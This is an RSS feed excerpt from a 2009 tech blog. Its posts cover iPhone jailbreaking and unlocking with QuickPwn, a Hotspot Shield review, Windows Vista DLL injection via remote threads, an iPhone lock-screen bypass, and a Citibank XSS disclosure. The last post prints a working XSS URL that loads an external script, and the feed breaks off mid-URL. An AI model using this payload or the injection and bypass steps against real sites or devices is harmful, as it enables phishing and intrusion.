style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-29-22" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182922-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182922-thumb.png" alt="28-03-2009 18-29-22" border="0" width="497" height="437" /></a></li><li>QuickPwn application will auto detect the firmware file(.ipsw extension) downloaded via iTunes.If it doesn’t detect the file then you may download these files from from apple servers.<b>Note:</b> For <b>2.2 restore firmware</b> ipsw file for&nbsp; <a
href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5830.20090127.Mmni6/iPhone1,1_2.2.1_5H11_Restore.ipsw" mce_href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5830.20090127.Mmni6/iPhone1,1_2.2.1_5H11_Restore.ipsw">2G iPhone1,1_2.2.1_5H11_Restore.ipsw</a> / <a
href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5828.20090127.aQLi8/iPhone1,2_2.2.1_5H11_Restore.ipsw" mce_href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5828.20090127.aQLi8/iPhone1,2_2.2.1_5H11_Restore.ipsw">3G iPhone1,2_2.2.1_5H11_Restore.ipsw</a><br
/> <a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091829434.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091829434.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-29-43" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182943-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009182943-thumb.png" alt="28-03-2009 18-29-43" border="0" width="496" height="437" /></a> <a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091830045.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091830045.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-30-04" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183004-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183004-thumb.png" alt="28-03-2009 18-30-04" border="0" width="496" height="392" /></a> <a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091830408.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091830408.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-30-40" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183040-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183040-thumb.png" alt="28-03-2009 18-30-40" border="0" width="493" height="434" /></a></li><li>Check the ‘<b>Add Cydia’ </b>and&nbsp; “<b>Add Installer</b>” – If you simply wants to upgrade into latest firmware. <b>Add Unlock</b> also if you also <b>wish to unlock your 2G iPhone.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091831013.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091831013.png"><img
style="border-width: 0px; display: inline;" mce_style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="28-03-2009 18-31-01" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183101-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183101-thumb.png" alt="28-03-2009 18-31-01" border="0" width="503" height="443" /></a></b></li><li>Just bypass this step if you don’t need any unlocking else<b> NOTE:&nbsp; You need to download following two binaries in case you want to unlock your iPhone.The binaries are as follows:</b><ul><li><a
class="downloadlink" href="http://www.honeytechblog.com/download/Binaries-3.9.bin" title="Version3.9 downloaded 267 times" >Binaries 3.9 (267)</a></li><li><a
class="downloadlink" href="http://www.honeytechblog.com/download/Binaries-4.6.bin" title="Version4.6 downloaded 250 times" >Binaries 4.6 (250)</a></li></ul><p><a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091831155.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091831155.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-31-15" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183115-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183115-thumb.png" alt="28-03-2009 18-31-15" border="0" width="499" height="313" /></a><a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091832094.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091832094.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-32-09" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183209-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183209-thumb.png" alt="28-03-2009 18-32-09" border="0" width="499" height="313" /></a></p><p><a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183224.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183224.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-32-24" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183224-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183224-thumb.png" alt="28-03-2009 18-32-24" border="0" width="498" height="313" /></a></p></li><li>Before performing the final action,check again if your iPhone is connected via USB cable.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091832436.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091832436.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-32-43" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183243-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183243-thumb.png" alt="28-03-2009 18-32-43" border="0" width="496" height="437" /></a></li><li>Caution: Follow the following procedure with precession as any delay results in fail:<ol><li>Hold the<b> Home key</b> for 3-5 seconds<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091833025.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091833025.png"><img
style="border-width: 0px; display: inline;" mce_style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="28-03-2009 18-33-02" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183302-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183302-thumb.png" alt="28-03-2009 18-33-02" border="0" width="449" height="345" /></a></li><li>Hold both <b>Home key</b> <b>+</b> <b>Power key</b> for 10 seconds</li><li>Now, release <b>Power key</b> but continue to hold <b>Home key</b> for 30 seconds<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091833353.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091833353.png"><img
style="border-width: 0px; display: inline;" mce_style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="28-03-2009 18-33-35" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183335-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183335-thumb.png" alt="28-03-2009 18-33-35" border="0" width="456" height="351" /></a></li><li>Note:Don’t forget to hold the <b>Home key</b> for the above 3 steps of jailbreaking.</li></ol></li><li><b>All done have fun:</b> Check your iPhone screen for the reboot and new motions.<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091834376.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/280320091834376.png"><img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="28-03-2009 18-34-37" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183437-thumb.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009183437-thumb.png" alt="28-03-2009 18-34-37" border="0" width="502" height="441" /></a></li><li>Now your iPhone will be flashed and reloaded with new firmware.<img
style="border-width: 0px; display: block; float: none; margin-left: auto; margin-right: auto;" mce_style="border-right-width: 0px; display: block; float: none; border-top-width: 0px; border-bottom-width: 0px; margin-left: auto; border-left-width: 0px; margin-right: auto" title="flashing-nor-iphone" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/flashingnoriphone.jpg" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/flashingnoriphone.jpg" alt="flashing-nor-iphone" border="0" width="507" height="381" /></li><li>In order to confirm the iPhone version you can also check by opening the iTunes<a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009184512.png" mce_href="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009184512.png"><img
style="border-width: 0px; display: inline;" mce_style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="28-03-2009 18-45-12" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009184512.png" mce_src="http://www.honeytechblog.com/wp-content/uploads/2009/03/28032009184512.png" alt="28-03-2009 18-45-12" border="0" width="504" height="337" /></a></li></ol><p><b>Files used:</b></p><ul><li>QuickPwn 2.2.5 <a
class="downloadlink" href="http://www.honeytechblog.com/download/QuickPwn-225-2.zip" title="Version2.25 downloaded 338 times" >QuickPwn for Windows (338)</a> or <a
class="downloadlink" href="http://www.honeytechblog.com/download/QuickPwn_2.2.5.dmg" title="Version2.25 downloaded 186 times" >QuickPwn for Mac (186)</a></li><li>Binaries – 1.<a
class="downloadlink" href="http://www.honeytechblog.com/download/Binaries-3.9.bin" title="Version3.9 downloaded 267 times" >Binaries 3.9 (267)</a> 2.<a
class="downloadlink" href="http://www.honeytechblog.com/download/Binaries-4.6.bin" title="Version4.6 downloaded 250 times" >Binaries 4.6 (250)</a></li><li><b>Restore firmware</b> files 1. <a
href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5830.20090127.Mmni6/iPhone1,1_2.2.1_5H11_Restore.ipsw" mce_href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5830.20090127.Mmni6/iPhone1,1_2.2.1_5H11_Restore.ipsw">iPhone1,1_2.2.1_5H11_Restore.ipsw</a> 2.<a
href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5828.20090127.aQLi8/iPhone1,2_2.2.1_5H11_Restore.ipsw" mce_href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-5828.20090127.aQLi8/iPhone1,2_2.2.1_5H11_Restore.ipsw">3G iPhone1,2_2.2.1_5H11_Restore.ipsw</a></li></ul><p><b></b></p><p><b>Note:</b><a
href="http://www.praval.com" mce_href="http://www.praval.com">Praval</a><a
href="http://www.praval.com/blog" mce_href="http://www.praval.com/blog"> </a>did this hack for a friend of his who owns an iPhone 2G!</p><p><b>Disclaimer:</b> This post is for education purpose,we don&#8217;t offer any liabilities and responsibilities for any misuse of this method.</p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/iphone-security-flaw-with-a-quick-fix/" rel="bookmark" title="August 31, 2008">iPhone Security Flaw with a quick fix</a></li><li><a
href="http://www.honeytechblog.com/lastfm-for-your-iphone/" rel="bookmark" title="July 19, 2008">Last.fm for your iPhone</a></li><li><a
href="http://www.honeytechblog.com/how-to-update-your-blog-to-wordpress-27/" rel="bookmark" title="December 12, 2008">How to update your blog to wordpress 2.7</a></li><li><a
href="http://www.honeytechblog.com/wordpress-262-released-how-and-why-to-upgrade-it-now/" rel="bookmark" title="September 9, 2008">Wordpress 2.6.2 Released, How and Why to Upgrade it now?</a></li><li><a
href="http://www.honeytechblog.com/reload-your-iphone-for-wordpress-download-application/" rel="bookmark" title="August 6, 2008">Reload your iphone for wordpress [Download id not defined]</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-upgrade-unlock-your-iphone-in-15-minutes/feed/</wfw:commentRss> <slash:comments>19</slash:comments> </item> <item><title>How to Shield in open wi-fi Hotspot</title><link>http://www.honeytechblog.com/how-to-shield-in-open-wi-fi-hotspot/</link> <comments>http://www.honeytechblog.com/how-to-shield-in-open-wi-fi-hotspot/#comments</comments> <pubDate>Tue, 17 Mar 2009 18:32:52 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[Full Download's]]></category> <category><![CDATA[How to]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[Reviews]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[free]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[blocked]]></category> <category><![CDATA[hackers]]></category> <category><![CDATA[Hotspot Shield]]></category> <category><![CDATA[network]]></category> <category><![CDATA[websites]]></category> <category><![CDATA[wi-fi]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=2975</guid> <description><![CDATA[When we are meeting on the coffee shops or in the malls we generally glad to access any available open wi-fi hotspots.Caution: While surfing we forget to have the security measures and gave the “dam” to internet shielding just to quickly access the mails,online business calls,tweets or other social networks.I think we forget that how [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-shield-in-open-wi-fi-hotspot%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How%20to%20Shield%20in%20open%20wi-fi%20Hotspot%22%20%7D);"></div><p>When we are meeting on the coffee shops or in the malls we generally glad to access any available open wi-fi hotspots.<strong>Caution:</strong> While surfing we forget to have the security measures and gave the “dam” to internet shielding just to quickly access the mails,online business calls,tweets or other social networks.I think we forget that <em>how some one was able to break into Paris Hilton&#8217;s  mobile and grab her address book and emails together with the some private tapes.</em></p><p>Need not to worry a lot because <strong><a
href="http://hotspotshield.com/">Hotspot Shield</a></strong> is freeware application that have very dense tunnels which prevents snoopers and hackers from viewing your email, instant messages, credit card information or anything else you send over the network.It guarantees for anonymous and censor-free internet usage. <img
style="border-top-width: 0px; display: block; border-left-width: 0px; float: none; border-bottom-width: 0px; margin-left: auto; margin-right: auto; border-right-width: 0px" title="hotspot" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/hotspot.jpg" border="0" alt="hotspot How to Shield in open wi fi Hotspot" width="550" height="222" /></p><p>Note:With the use of Hotspot Shield you can even <strong>access blocked websites</strong>. For example: <a
href="http://download.cnet.com/Hotspot-Shield/3000-2092_4-10594721.html?tag=mncol;pop">download.com</a> described that</p><blockquote><p>Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, <a
class="zem_slink" title="HotSpot" rel="homepage" href="http://openjdk.java.net/groups/hotspot/">HotSpot</a> Shield is is not an invasive adware or pervasive spyware application.</p></blockquote><p>Moreover some members of Cnet.com also reviewed the product ,the basic snip  is as follows</p><blockquote><p>This freeware program promises to encrypt all your Internet connections, but since most public wi-fi access points in the U.S. are open, it&#8217;s a bit hard to gauge Hotspot Shield&#8217;s effectiveness. However, the connection itself is a bit wonky.</p></blockquote><blockquote><p>Once the program is installed, it creates an HTML link on your desktop. Double-clicking on it will open the application in your Web browser, and you&#8217;ll be taken to a page detailing your Connection Status, IP Address, Server Address, Bytes sent and received, and the duration of the connection. Hotspot Shield is ad supported, so you&#8217;ll get a big banner ad that lives at the top of every Web page, too. Closing the tab with the app&#8217;s control panel doesn&#8217;t disconnect the shield, though: for that, or to reload the control panel, you have to go through the green shield icon that gets loaded into your system tray. Also, there&#8217;s a 5 GB transfer limit.</p></blockquote><blockquote><p>Overall, we can&#8217;t give Hotspot Shield a strong recommendation, but as a last resort it might be worth trying out.</p><p><strong>Reviewed by: </strong>Seth Rosenblatt</p></blockquote><p><a
href="http://hotspotshield.com/downloads/thank-you-IN/"><strong>Download Now</strong></a></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/zonealarm-antivirus-for-windows-vista/" rel="bookmark" title="July 14, 2007">ZoneAlarm Antivirus for Windows Vista</a></li><li><a
href="http://www.honeytechblog.com/download-skype-30/" rel="bookmark" title="February 5, 2007">Download  Skype 3.0</a></li><li><a
href="http://www.honeytechblog.com/how-to-find-my-ip-address-and-display-it-in-website/" rel="bookmark" title="March 10, 2009">How to find my IP address and display it in website</a></li><li><a
href="http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/" rel="bookmark" title="April 30, 2009">TeamViewer Brings More Faster Messaging, Presentations In Version 4.1</a></li><li><a
href="http://www.honeytechblog.com/how-to-get-free-dial-up-service-using-juno/" rel="bookmark" title="August 29, 2007">How to Get Free Dial up Service Using Juno</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-shield-in-open-wi-fi-hotspot/feed/</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Hacking : Remote Threads injection in Windows Vista</title><link>http://www.honeytechblog.com/hacking-remote-threads-injection-in-windows-vista/</link> <comments>http://www.honeytechblog.com/hacking-remote-threads-injection-in-windows-vista/#comments</comments> <pubDate>Tue, 17 Mar 2009 17:23:23 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[Microsoft]]></category> <category><![CDATA[NewsTech]]></category> <category><![CDATA[Stuff]]></category> <category><![CDATA[Vista]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[injection]]></category> <category><![CDATA[Remote]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=2968</guid> <description><![CDATA[Recently astalavista.com present the Win Vista DLL Injection where they showed remote threads injection in Windows Vista.Some snip is  simply introduced as
An insight on how to inject a dynamic library (DLL) into a 32 bit process in Windows Vista with the use of Remote Threads and taking into consideration the Address Space Layout Randomization [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhacking-remote-threads-injection-in-windows-vista%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Hacking%20%3A%20Remote%20Threads%20injection%20in%20Windows%20Vista%22%20%7D);"></div><p>Recently astalavista.com present the <a
href="http://www.astalavista.com/?section=directory&amp;cmd=detail&amp;id=2014">Win Vista DLL Injection</a> where they showed <strong>remote threads injection in Windows Vista.</strong>Some snip is<strong> </strong> simply introduced as</p><blockquote><p>An insight on how to inject a dynamic library (DLL) into a 32 bit process in <strong>Windows Vista</strong> with the use of Remote Threads and taking into consideration the <a
class="zem_slink" title="Address space layout randomization" rel="wikipedia" href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">Address Space Layout Randomization</a> (ASLR). The sample code used is written in assembly language (<a
class="zem_slink" title="MASM32" rel="wikipedia" href="http://en.wikipedia.org/wiki/MASM32">MASM32</a>) using the WinAsm IDE. It should give you a better understanding on how <a
class="zem_slink" title="Library (computing)" rel="wikipedia" href="http://en.wikipedia.org/wiki/Library_%28computing%29">dynamic libraries</a> can be injected.</p></blockquote><p><img
style="border-top-width: 0px; display: block; border-left-width: 0px; float: none; border-bottom-width: 0px; margin-left: auto; margin-right: auto; border-right-width: 0px" title="vista" src="http://www.honeytechblog.com/wp-content/uploads/2009/03/vista.jpg" border="0" alt="vista Hacking : Remote Threads injection in Windows Vista" width="546" height="221" /> You need various tools to perform this hack on windows Vista.So before going further download HiEditor and <strong><a
href="http://www.winasm.net/winasm-studio-downloads.html">WinAsm Studio IDE</a>.</strong></p><p>Some of the insights of the hack is described as follows :</p><blockquote><p><strong>Why Remote Thread?</strong><br
/> The idea behind using a remote thread to inject a dynamic library is to create a new thread in a remote process that calls the LoadLibrary API and load our DLL inside the <a
class="zem_slink" title="Address space" rel="wikipedia" href="http://en.wikipedia.org/wiki/Address_space">address space</a> of that remote thread. The problem with directly parsing the LoadLibrary offset to CreateRemoteThread is that it resolves to the address in your process import table which unfortunately is not the same as the remote process import table. To overcome this problem we need to find the offset of LoadLibrary inside the address space layout of our process.</p></blockquote><blockquote><p><strong>ASLR and LoadLibrary</strong><br
/> Since at each reboot (or two) the address of <a
class="zem_slink" title="Kernel32.dll" rel="wikipedia" href="http://en.wikipedia.org/wiki/Kernel32.dll">kernel32.dll</a> (which contains the LoadLibrary procedure) might change we use GetModuleHandle to retrieve the address of LoadLibraryA which will be the same in the remote thread address space.</p></blockquote><blockquote><p><strong>How to parse an argument to LoadLibrary</strong><br
/> The DLL’s pathname cannot be addressed to since it does not reside within the remote process address space. We therefore have to call VirtualAllocEx to allocate memory in the remote process and therefore patch the pathname of the DLL we intent to inject. We can do that by using WriteProcessMemory API.</p></blockquote><p><strong>Download the pdf file</strong><br
/> <a
href="http://www.honeytechblog.com/wp-content/uploads/2009/03/hacking-remote-threads-injection-windows-vista.pdf">hacking-remote-threads-injection-windows-vista</a></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/12-exclusive-windows-7-wallpapers-for-free/" rel="bookmark" title="April 29, 2009">12 Exclusive Windows 7 Wallpapers For Free</a></li><li><a
href="http://www.honeytechblog.com/try-microsoft-windows-7-rc-for-free/" rel="bookmark" title="May 6, 2009">Try Microsoft Windows 7 RC For Free</a></li><li><a
href="http://www.honeytechblog.com/how-to-find-my-ip-address-and-display-it-in-website/" rel="bookmark" title="March 10, 2009">How to find my IP address and display it in website</a></li><li><a
href="http://www.honeytechblog.com/ubuntu-810-in-windows/" rel="bookmark" title="November 2, 2008">Ubuntu 8.10 in Windows</a></li><li><a
href="http://www.honeytechblog.com/creative-charging-999-for-vista-update/" rel="bookmark" title="July 6, 2007">Creative charging $9.99 for Vista update?</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/hacking-remote-threads-injection-in-windows-vista/feed/</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>iPhone Security Flaw with a quick fix</title><link>http://www.honeytechblog.com/iphone-security-flaw-with-a-quick-fix/</link> <comments>http://www.honeytechblog.com/iphone-security-flaw-with-a-quick-fix/#comments</comments> <pubDate>Sun, 31 Aug 2008 07:53:38 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[How to]]></category> <category><![CDATA[PDA]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[ipod]]></category> <category><![CDATA[apple]]></category> <category><![CDATA[hack]]></category> <category><![CDATA[iphone]]></category> <category><![CDATA[iphone 3G]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=1526</guid> <description><![CDATA[
Recently i watch a Security Flaw with the iPhone running the Firmware version 2.0.2 that gave a personal access to your email account and contacts when you have your iPhone locked.
How to do this hackGo to the unlock screen
Try to unlock your keypad
Their will be a popup screen with a password screen
Hit your home [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fiphone-security-flaw-with-a-quick-fix%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22iPhone%20Security%20Flaw%20with%20a%20quick%20fix%22%20%7D);"></div><p><span
class="youtube"><object
width="425" height="350" type="application/x-shockwave-flash" data="http://www.youtube.com/v/gDWiNRbkQGk"><param
name="movie" value="http://www.youtube.com/v/gDWiNRbkQGk" /><param
name="wmode" value="transparent" /></object></span></p><p><span>Recently i watch a Security Flaw with the iPhone running the Firmware version 2.0.2 that gave a personal access to your email account and contacts when you have your iPhone locked.</span></p><p><strong><span>How to do this hack</span></strong></p><ol><li>Go to the unlock screen</li><li>Try to unlock your keypad</li><li>Their will be a popup screen with a password screen</li><li>Hit your home tab buttons two times and bingo, you are done</li></ol><p><strong><span>How to fix this</span></strong></p><ol><li>Go to Setting&gt; General &gt;Home Button</li><li> Double hit your home button</li><li> Change your Home to Ipod , temporally fix your problem</li></ol><p>This is a quick but not permanent fix to this security Flaw</p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/how-to-upgrade-unlock-your-iphone-in-15-minutes/" rel="bookmark" title="March 29, 2009">How to upgrade / unlock your iPhone in 15 minutes</a></li><li><a
href="http://www.honeytechblog.com/reload-your-iphone-for-wordpress-download-application/" rel="bookmark" title="August 6, 2008">Reload your iphone for wordpress [Download id not defined]</a></li><li><a
href="http://www.honeytechblog.com/top-7-reasons-to-say-no-to-iphone-3g/" rel="bookmark" title="July 31, 2008">Top 7 reasons to say no to iphone 3G</a></li><li><a
href="http://www.honeytechblog.com/how-to-hide-a-categories-posts-from-home-page-without-any-plugin/" rel="bookmark" title="September 11, 2009">How to hide a categories posts from Home page without using any plugin</a></li><li><a
href="http://www.honeytechblog.com/how-to-hide-a-categories-posts-from-wordpress-rss-feeds-without-using-any-plugin/" rel="bookmark" title="September 14, 2009">How to hide a categories posts from wordpress RSS Feeds without using any plugin</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/iphone-security-flaw-with-a-quick-fix/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Citibank is not safe &#8211; new vulnerabilities</title><link>http://www.honeytechblog.com/citibank-is-not-safe-new-vulnerabilities/</link> <comments>http://www.honeytechblog.com/citibank-is-not-safe-new-vulnerabilities/#comments</comments> <pubDate>Mon, 18 Aug 2008 00:06:36 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[NewsTech]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[citybank]]></category> <category><![CDATA[vulnerabilities]]></category> <category><![CDATA[xss]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=1422</guid> <description><![CDATA[Recent news from xssed.com revealed a new vulnerabilities of Citibank which is count in as worlds major bank.
What is the actual problem?
Actually due to new xss vulnerabilities its very easy for a phishers to display a Citibank phishing page until their victim&#8217;s session cookie expires or gets deleted.
Citibank.com XSS and display following link on its [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fcitibank-is-not-safe-new-vulnerabilities%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Citibank%20is%20not%20safe%20-%20new%20vulnerabilities%22%20%7D);"></div><p><img
src="http://farm4.static.flickr.com/3088/2772069987_e61bec33bc_m.jpg" alt="http://farm4.static.flickr.com/3088/2772069987_e61bec33bc_m.jpg" align="right" title="Citibank is not safe   new vulnerabilities photo" />Recent news from xssed.com revealed a new vulnerabilities of Citibank which is count in as worlds major bank.</p><p><strong>What is the actual problem?</strong></p><p>Actually due to new xss vulnerabilities its very easy for a phishers to display a Citibank phishing page until their victim&#8217;s session cookie expires or gets deleted.</p><p><strong>Citibank.com XSS and display following link on its window:</strong><br
/> <a
href="http://www.citibank.com/domain/contact/index.htm?_u=visitor&amp;_uid=&amp;_profile=%22/%3E%3Ciframe%20src=http://google.com%3E%3C/iframe%3E%3Cscript%20src=http://ha.ckers.org/xss.js?/%3E&amp;_products=NNNNNNNNNNNNNNNNN&amp;_ll=&amp;_mid=&amp;_dta=&amp;_m=0&amp;_cn=&amp;_j=&amp;_jcontext=/US&amp;_jfp=false&amp;BVE=https://web.da-us.citibank.com&amp;BVP=/cgi-bin/citifi/scripts/&amp;BV_UseBVCookie=yes">http://www.citibank.com/domain/contact/index.htm?_u=visitor&amp;_uid=&amp;_profile=<br
/> &#8220;/&gt;&lt;iframesrc=http://google.com&gt;&lt;/iframe&gt;&lt;scriptsrc=http://ha.ckers.org/xss.js?/&gt;<br
/> &amp;_products=NNNNNNNNNNNNNNNNN&amp;_ll=&amp;_mid=&amp;_dta=&amp;_m=0&amp;_cn=&amp;_j=<br
